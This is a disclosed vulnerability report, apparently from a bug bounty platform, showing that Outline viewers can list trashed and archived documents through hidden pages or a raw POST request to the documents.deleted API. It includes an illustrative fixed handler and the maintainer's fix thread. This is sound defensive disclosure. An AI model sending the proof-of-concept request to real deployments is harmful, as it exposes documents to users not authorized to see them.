Documents in trash accessible by Viewer role in outline/outline

Valid

Reported on

Jul 3rd 2022


Description

Once a document is archived or deleted, there is no way to access it through the UI or the document link. However, the API still returns the file information and content. The same applies to archived files.

Proof of Concept

  1. Give a user Viewer role.
  2. Visit https://your.getoutline.com/trash or https://you.getoutline.com/archive as a viewer. (The GUI has no link to the archive and trash pages, and the URL of any archived or deleted document returns a Not Found message unless it is opened via the given URLs, /trash and /archive.)
  3. Or send the following HTTP request with the viewer's accessToken:
POST /api/documents.deleted HTTP/1.1
Host: softwarica.getoutline.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Origin: https://you.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer <token>
Connection: close


{"limit":25,"offset":0}

Impact

Unauthorized access to deleted and archived documents and their contents.
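
The gap described above, hiding trash and archive in the UI while the API checks only authentication, is modelled below as an added example; it is not code from the report or from Outline. The roles, in-memory store, handler names and the policy that viewers may not list trash or archive are assumptions made for illustration.

```typescript
// Added illustration, not Outline's code: roles, store and handlers are hypothetical.
type Role = "admin" | "member" | "viewer";
type State = "deleted" | "archived";
interface User { id: string; role: Role }
interface Doc { id: string; text: string; deletedAt: string | null; archivedAt: string | null }
interface ApiResponse { status: number; data: Doc[] }
type Handler = (user: User | null, state: State, limit: number, offset: number) => ApiResponse;

// Constructed sample data: one live, one trashed, one archived document.
const DOCS: Doc[] = [
  { id: "d1", text: "live notes", deletedAt: null, archivedAt: null },
  { id: "d2", text: "trashed draft", deletedAt: "2022-07-01", archivedAt: null },
  { id: "d3", text: "archived plan", deletedAt: null, archivedAt: "2022-06-15" },
];

function select(state: State, limit: number, offset: number): Doc[] {
  const hits = DOCS.filter((d: Doc) => (state === "deleted" ? d.deletedAt : d.archivedAt) !== null);
  return hits.slice(offset, offset + limit);
}

// Before: authentication only. The missing UI link was the sole barrier.
const listVulnerable: Handler = (user, state, limit, offset) =>
  user ? { status: 200, data: select(state, limit, offset) } : { status: 401, data: [] };

// Assumed policy for this sketch: read-only viewers may not list trash or archive.
function canListHidden(user: User): boolean {
  return user.role === "admin" || user.role === "member";
}

// After: the authorization decision is enforced in the API handler itself.
const listHardened: Handler = (user, state, limit, offset) => {
  if (!user) return { status: 401, data: [] };
  if (!canListHidden(user)) return { status: 403, data: [] };
  return { status: 200, data: select(state, limit, offset) };
};

// Regression check: the states for which a viewer receives document bodies.
function viewerLeaks(handler: Handler): string[] {
  const leaks: string[] = [];
  for (const state of ["deleted", "archived"] as State[]) {
    const res = handler({ id: "u-viewer", role: "viewer" }, state, 25, 0);
    if (res.status === 200 && res.data.length > 0) leaks.push(state);
  }
  return leaks;
}
```

Running `viewerLeaks` against every list handler as part of the test suite catches the case where a route is hidden in the client but never checked on the server.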

We are processing your report and will contact the outline team within 24 hours. a month ago
nerrorsec modified the report
a month ago
nerrorsec modified the report
a month ago
outline/outline maintainer has acknowledged this report a month ago
Tom Moor modified the Severity from High (7.1) to Medium (5.4) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Moor validated this vulnerability a month ago
nerrorsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor
a month ago

Maintainer


Fix in progress

nerrorsec
a month ago

Researcher


Thank you very much :-)

Tom Moor confirmed that a fix has been merged on 831df6 a month ago
The fix bounty has been dropped
documents.tsx#L23-L45 has been validated
documents.ts#L209 has been validated
documents.ts#L165 has been validated